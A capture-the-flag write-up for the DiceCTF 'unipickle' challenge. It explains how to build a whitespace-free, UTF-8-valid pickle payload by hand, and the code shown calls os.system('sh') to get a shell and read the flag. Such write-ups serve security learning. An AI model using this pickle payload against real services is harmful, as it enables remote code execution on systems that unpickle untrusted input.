u.twoha.cc/ctf/dicectf/misc_unipickle.md at 50474d894050974d66566d5ba73188e3a085a7e2

caandt/u.twoha.cc


caandt 50474d8940 yeah

2024-09-13 19:49:18 -05:00


Task

misc/unipickle

pickle

nc mc.ax 31773

unipickle.py

Author: kmh
Points: 144
Solves: 68 / 1040 (6.538%)

Writeup

The challenge consists of a very short Python file that unpickles our input and exits:

#!/usr/local/bin/python
import pickle
pickle.loads(input("pickle: ").split()[0].encode())

Looking at Python's documentation for the pickle module, we can see the following:

Warning: The pickle module is not secure. Only unpickle data you trust. It is possible to construct malicious pickle data which will execute arbitrary code during unpickling. Never unpickle data that could have come from an untrusted source, or that could have been tampered with.

A quick search shows that we can get a shell by pickling an object whose __reduce__ method returns a callable and its arguments, which the unpickler then calls for us:

import pickle
import os

class A:
    def __reduce__(self):
        return (os.system, ('sh',))

payload = pickle.dumps(A())
print(payload)
# b'\x80\x04\x95\x1d\x00\x00\x00\x00\x00\x00\x00\x8c\x05posix\x94\x8c\x06system\x94\x93\x94\x8c\x02sh\x94\x85\x94R\x94.'

Now we just need to send this to the program:

from pwn import remote

r = remote('mc.ax', 31773)
r.sendline(payload)
r.interactive()

However, when we run this, we get the following error:

pickle: Traceback (most recent call last):
  File "/app/run", line 3, in <module>
    pickle.loads(input("pickle: ").split()[0].encode())
                 ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
UnicodeEncodeError: 'utf-8' codec can't encode character '\udc80' in position 0: surrogates not allowed

It appears that our pickle code will need to be a valid UTF-8 string.
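
The error can be reproduced locally without touching the server. The sketch below assumes that the server's stdin decodes incoming bytes with the surrogateescape error handler, which is what the '\udc80' in the traceback suggests. The variable names are only illustrative.

```python
# 0x80 is the PROTO opcode that starts every protocol 2+ pickle.
# On its own it is not a valid UTF-8 start byte.
raw = b'\x80\x04'

# Assumption: stdin decodes with errors='surrogateescape', which maps the
# undecodable byte 0x80 to the lone surrogate U+DC80 instead of failing.
text = raw.decode('utf-8', errors='surrogateescape')
print(ascii(text))

# The challenge then calls .encode() with the default strict handler,
# which refuses lone surrogates.
try:
    text.encode()
    encode_failed = False
except UnicodeEncodeError as exc:
    encode_failed = True
    print(exc)
```

So any byte sequence that is not valid UTF-8 makes it through input() but dies in .encode() before pickle.loads ever sees it.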

The pickle format has gone through multiple iterations, called protocols. Protocol 0 was the first pickle format and was designed to consist entirely of ASCII characters.

Let's try dumping our code again, this time using protocol 0:

payload = pickle.dumps(A(), protocol=0)
print(payload)
# b'cposix\nsystem\np0\n(Vsh\np1\ntp2\nRp3\n.'

Now we get a different error:

pickle: Traceback (most recent call last):
  File "/app/run", line 3, in <module>
    pickle.loads(input("pickle: ").split()[0].encode())
_pickle.UnpicklingError: pickle data was truncated

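A closer look at the code reveals two restrictions: input() reads only a single line, and split()[0] keeps only the text before the first run of whitespace. Our payload was cut off at its first newline, which means that we cannot use any spaces, newlines, or other whitespace in our pickle code.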
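
To see exactly what the unpickler receives, the server's input handling can be approximated locally. This is a rough model: server_view is a hypothetical helper, and it assumes that input() simply returns everything before the first newline and that stdin decodes with surrogateescape.

```python
def server_view(sent: bytes) -> bytes:
    """Approximate the bytes that pickle.loads() receives for what we send."""
    # input() returns a single line, without its trailing newline
    line = sent.split(b'\n', 1)[0].decode('utf-8', errors='surrogateescape')
    # split() with no arguments cuts on any run of whitespace; [0] keeps the first token
    return line.split()[0].encode()

proto0 = b'cposix\nsystem\np0\n(Vsh\np1\ntp2\nRp3\n.'
print(server_view(proto0))          # b'cposix'
print(server_view(b'ab cd\tef\n'))  # b'ab'
```

Only b'cposix' reaches the unpickler, so the GLOBAL opcode never sees the end of its first argument.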

We can try using every protocol available (up to protocol 5), but none of them run without error. Since we cannot produce pickle code that will pass this challenge using pickle.dumps, we will have to write the pickle code by hand.
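
A quick local check of every protocol might look like the sketch below. The survives helper is hypothetical: it only tests whether a payload is valid UTF-8 and contains no whitespace that str.split() would cut on, which are the two constraints identified so far. Nothing is unpickled here, so os.system is never called.

```python
import os
import pickle

class A:
    def __reduce__(self):
        # only pickled in this sketch, never unpickled
        return (os.system, ('sh',))

def survives(payload: bytes) -> bool:
    """True if the payload is valid UTF-8 and a single whitespace-free token."""
    try:
        text = payload.decode('utf-8')
    except UnicodeDecodeError:
        return False
    return text.split() == [text]

results = {proto: survives(pickle.dumps(A(), protocol=proto))
           for proto in range(pickle.HIGHEST_PROTOCOL + 1)}
print(results)
```

Protocols 0 and 1 fail because GLOBAL uses newline-terminated arguments, and protocols 2 and up fail because they start with the byte 0x80.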

The pickletools module contains a considerable amount of documentation on the pickle format, including a brief overview on pickling:

"A pickle" is a program for a virtual pickle machine (PM, but more accurately called an unpickling machine). It's a sequence of opcodes, interpreted by the PM, building an arbitrarily complex Python object.

For the most part, the PM is very simple: there are no looping, testing, or conditional instructions, no arithmetic and no function calls. Opcodes are executed once each, from first to last, until a STOP opcode is reached.

The PM has two data areas, "the stack" and "the memo".

Many opcodes push Python objects onto the stack; e.g., INT pushes a Python integer object on the stack, whose value is gotten from a decimal string literal immediately following the INT opcode in the pickle bytestream. Other opcodes take Python objects off the stack. The result of unpickling is whatever object is left on the stack when the final STOP opcode is executed.

The memo is simply an array of objects, or it can be implemented as a dict mapping little integers to objects. The memo serves as the PM's "long term memory", and the little integers indexing the memo are akin to variable names. Some opcodes pop a stack object into the memo at a given index, and others push a memo object at a given index onto the stack again.
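
A few tiny hand-written pickles make the stack and the memo concrete. These examples are not from the challenge. They only use the protocol 0 opcodes INT ('I'), MARK ('('), LIST ('l'), PUT ('p'), POP ('0'), GET ('g') and STOP ('.'), and they are run locally, where newlines are allowed.

```python
import pickle

# INT pushes 42, STOP returns whatever is on top of the stack
single = pickle.loads(b'I42\n.')

# MARK, push 1, push 2, then LIST collects everything above the mark
as_list = pickle.loads(b'(I1\nI2\nl.')

# push 7, store it in memo[0], pop it off the stack, then fetch it back from the memo
via_memo = pickle.loads(b'I7\np0\n0g0\n.')

print(single, as_list, via_memo)  # 42 [1, 2] 7
```

Note that PUT stores the top of the stack in the memo without removing it, which is why the third example needs an explicit POP to empty the stack.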

pickletools also lets us disassemble pickle code, so let's see how our previous payload works:

>>> import pickletools
>>> pickletools.dis(payload)
    0: c    GLOBAL     'posix system'
   14: p    PUT        0
   17: (    MARK
   18: V        UNICODE    'sh'
   22: p        PUT        1
   25: t        TUPLE      (MARK at 17)
   26: p    PUT        2
   29: R    REDUCE
   30: p    PUT        3
   33: .    STOP
highest protocol among opcodes = 0

The important instructions to look at are:

# push the global posix.system onto the pickle stack (which is the same as os.system here)
    0: c    GLOBAL     'posix system'
# push a mark onto the pickle stack
   17: (    MARK
# push the string 'sh' onto the pickle stack
   18: V        UNICODE    'sh'
# pop until the mark and create a tuple of popped items
   25: t        TUPLE      (MARK at 17)
# call stack[-2](*stack[-1]) => posix.system('sh')
   29: R    REDUCE
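
The same five-opcode pattern can be tried safely by swapping in a harmless callable. The sketch below is an illustration rather than part of the exploit: it targets builtins.len instead of posix.system and drops the PUT opcodes, which are not needed.

```python
import pickle

# GLOBAL 'builtins len', MARK, UNICODE 'abc', TUPLE, REDUCE, STOP
harmless = b'cbuiltins\nlen\n(Vabc\ntR.'

result = pickle.loads(harmless)
print(result)  # 3, i.e. len('abc')
```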

The GLOBAL ('c') instruction requires two string arguments ending in newlines, so we cannot use this instruction. Another instruction that loads a global, without any newline-terminated arguments, is STACK_GLOBAL ('\x93'), which pops the attribute name and the module name off the stack.

We also cannot use the UNICODE ('V') instruction since it takes a single string argument ending in a newline. Instead, we can use the BINUNICODE ('X') instruction, which is followed by a little-endian uint32 and a UTF-8 encoded string with length equal to the first argument.
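
The BINUNICODE encoding is easy to generate with struct. The binunicode helper below is a hypothetical convenience function, and the example again targets builtins.len so that it can be loaded safely. It still contains the raw '\x93' byte, so it is only meant for local experiments.

```python
import pickle
import struct

def binunicode(s: str) -> bytes:
    """Encode s as a BINUNICODE instruction: 'X', uint32 length (little-endian), UTF-8 data."""
    data = s.encode('utf-8')
    return b'X' + struct.pack('<I', len(data)) + data

print(binunicode('os'))  # b'X\x02\x00\x00\x00os'

# push 'builtins' and 'len', STACK_GLOBAL, MARK, push 'abc', TUPLE, REDUCE, STOP
harmless = (binunicode('builtins') + binunicode('len') + b'\x93'
            + b'(' + binunicode('abc') + b't' + b'R' + b'.')
result = pickle.loads(harmless)
print(result)  # 3
```

One thing to keep in mind with this encoding is that the length bytes are part of the payload too, so a string whose length is, for example, 10 or 32 bytes would reintroduce a whitespace byte.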

Now our pickle code without any whitespace is as follows:

# push 'os' to the stack
payload = b'X\x02\x00\x00\x00os'
# push 'system' to the stack
payload += b'X\x06\x00\x00\x00system'
# pop 'os' and 'system', push os.system
payload += b'\x93'
# push a mark
payload += b'('
# push 'sh'
payload += b'X\x02\x00\x00\x00sh'
# pop mark and 'sh', push ('sh',)
payload += b't'
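# pop os.system and ('sh',), call os.system('sh')
# (the call happens at this opcode, so no trailing STOP is needed to get the shell)
payload += b'R'

# the server's str.split() must leave our payload as a single token
# (\x1c-\x1f also count as whitespace for str.split())
assert all(b not in payload for b in b' \t\n\r\x0b\x0c\x1c\x1d\x1e\x1f')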

However, our code is still not valid UTF-8. For our code to be valid UTF-8, any byte matching 0b10xxxxxx (a continuation byte) must come directly after one of the following:

a byte matching 0b110xxxxx
a byte matching 0b1110xxxx followed by a byte matching 0b10xxxxxx
a byte matching 0b11110xxx followed by 2 bytes matching 0b10xxxxxx

The only part causing a problem is the STACK_GLOBAL instruction, since its opcode is '\x93', or 0b10010011. The rest of the bytes all have 0 in the most significant bit, so they will not cause any problems.
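
This can be confirmed by listing every byte with the high bit set and asking the decoder where it gives up. The sketch rebuilds the whitespace-free payload from above and never unpickles it.

```python
payload = (b'X\x02\x00\x00\x00os'
           + b'X\x06\x00\x00\x00system'
           + b'\x93'
           + b'('
           + b'X\x02\x00\x00\x00sh'
           + b't'
           + b'R')

# every byte with the most significant bit set, as (offset, hex, bits)
high = [(i, hex(b), format(b, '08b')) for i, b in enumerate(payload) if b & 0x80]
print(high)  # [(18, '0x93', '10010011')]

try:
    payload.decode('utf-8')
    bad_offset = None
except UnicodeDecodeError as exc:
    bad_offset = exc.start
    print(exc)
```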

To fix our code, we will choose to satisfy the first option, as it is the simplest.

Now we just need to find an instruction to come before STACK_GLOBAL that ends with a byte matching 0b110xxxxx (other than 0xc0 and 0xc1, which are never valid in UTF-8). Additionally, this instruction must not push or pop anything from the stack because we need 'os' and 'system' to be on top when STACK_GLOBAL is executed.

One such instruction is the BINPUT ('q') instruction, which is followed by a uint8 that specifies which index of the memo to copy the top of the stack into. This is effectively a no-op in our case.
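
Which memo indices actually work can be found by brute force. The sketch below uses a hypothetical operand_works helper that tries each possible uint8 operand and keeps those for which 'q', the operand, and '\x93' together form valid, whitespace-free UTF-8.

```python
def operand_works(operand: int) -> bool:
    """True if BINPUT with this operand, followed by STACK_GLOBAL, is acceptable to the server."""
    chunk = bytes([ord('q'), operand, 0x93])
    try:
        text = chunk.decode('utf-8')
    except UnicodeDecodeError:
        return False
    # str.split() must not cut the chunk apart
    return text.split() == [text]

usable = [b for b in range(256) if operand_works(b)]
print([hex(b) for b in usable])
```

Every operand from 0xc2 through 0xdf passes, so the choice of memo index is fairly free.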

After inserting the following line right before we add STACK_GLOBAL, our code becomes valid UTF-8:

# put 'system' into index 195 of the memo
payload += b'q\xc3'
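
As a final local sanity check, the complete payload can be pushed through the same decode, split, and encode steps that the server applies, and its opcodes listed with pickletools.genops, which parses a pickle without executing it. Two details in this sketch are assumptions for local use only: the payload is written out as one literal, and a STOP byte is appended for genops because it refuses pickles that lack one.

```python
import pickletools

payload = (b'X\x02\x00\x00\x00os'       # push 'os'
           b'X\x06\x00\x00\x00system'   # push 'system'
           b'q\xc3'                     # BINPUT 195, keeps the next byte valid UTF-8
           b'\x93'                      # STACK_GLOBAL
           b'('                         # MARK
           b'X\x02\x00\x00\x00sh'       # push 'sh'
           b't'                         # TUPLE
           b'R')                        # REDUCE

# mimic the server: the str it gets from input(), then .split()[0].encode()
text = payload.decode('utf-8')
round_trip = text.split()[0].encode()
print(round_trip == payload)

# genops only decodes opcodes and never calls anything
names = [op.name for op, arg, pos in pickletools.genops(payload + b'.')]
print(names)
```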

Running our script now successfully gives us a shell. From here, we run the following commands to get the flag:

$ ls /
app
bin
boot
dev
etc
flag.eEdyUbJSVb2TmzALwXHS.txt
home
lib
lib32
lib64
libx32
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var
$ cat /flag.eEdyUbJSVb2TmzALwXHS.txt
dice{pickle_5d9ae1b0fee}
